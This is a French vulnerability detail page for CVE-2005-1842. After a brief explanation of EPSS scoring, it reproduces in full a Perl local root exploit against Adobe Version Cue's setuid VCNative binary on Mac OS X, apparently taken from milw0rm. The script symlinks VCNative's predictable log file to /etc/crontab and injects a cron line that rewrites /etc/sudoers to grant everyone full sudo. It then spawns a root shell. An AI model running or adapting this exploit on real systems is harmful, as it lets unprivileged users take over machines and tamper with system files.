CVE-2005-1842 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl # # Adobe Version Cue VCNative[OSX]: local root exploit. # # by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) # # Adobe Version Cue's VCNative program writes data to a log file in # the current working directory while running as (setuid) root. the # logfile is formated as <cwd>/VCNative-<pid>.log, which is easily # predictable. you may link this file to any file on the system # and overwrite its contents. use of the "-host" option (with # "-port") will allow user-supplied data to be injected into the # file. # # This exploit works by overwriting /etc/crontab with # '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and # log garbage. within a short period of time crontab will overwrite # /etc/sudoers and "sudo sh" to root is possible. this method is used # because direct overwriting of /etc/sudoers will cause sudo to exit # with configuration errors due to the log garbage, whereas crontab # will ignore it. (this exploit requires both cron to be running and # sudo to exist--this is generally default osx) use POSIX; $vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" . "WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative"; $vcn_pid=($$ + 1); $vcn_cwd="/tmp"; $vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log"; $ovrfile="/etc/crontab"; $ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers"; sub pexit{print("[!] @_.\n");exit(1);} print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n"); print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n"); if(!-f $vcn_path){ pexit("VCNative binary doesn't appear to exist"); } if(!-f"/etc/crontab"||!-f"/etc/sudoers"){ pexit("/etc/crontab and /etc/sudoers are required for this to work"); } print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n"); symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files."); @ast=stat($ovrfile); print("[*] running VCNative...\n"); system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\""); print("[*] removing $vcn_tempfile...\n"); unlink($vcn_tempfile); @st=stat($ovrfile); if($st[7]==$ast[7]&&$st[9]==$ast[9]){ pexit("$ovrfile was not modified, exploit failed"); } else{ print("[*] $ovrfile was overwritten successfully...\n"); } print("[*] waiting for crontab to change /etc/sudoers...\n"); @ast=@st=stat("/etc/sudoers"); while($st[7]==$ast[7]&&$st[9]==$ast[9]){ sleep(1); @ast=stat("/etc/sudoers"); } print("[*] /etc/sudoers has been modified.\n"); print("[*] attempting to \"sudo sh\". (use YOUR password)\n"); system("sudo sh"); exit(0); # milw0rm.com [2005-08-30]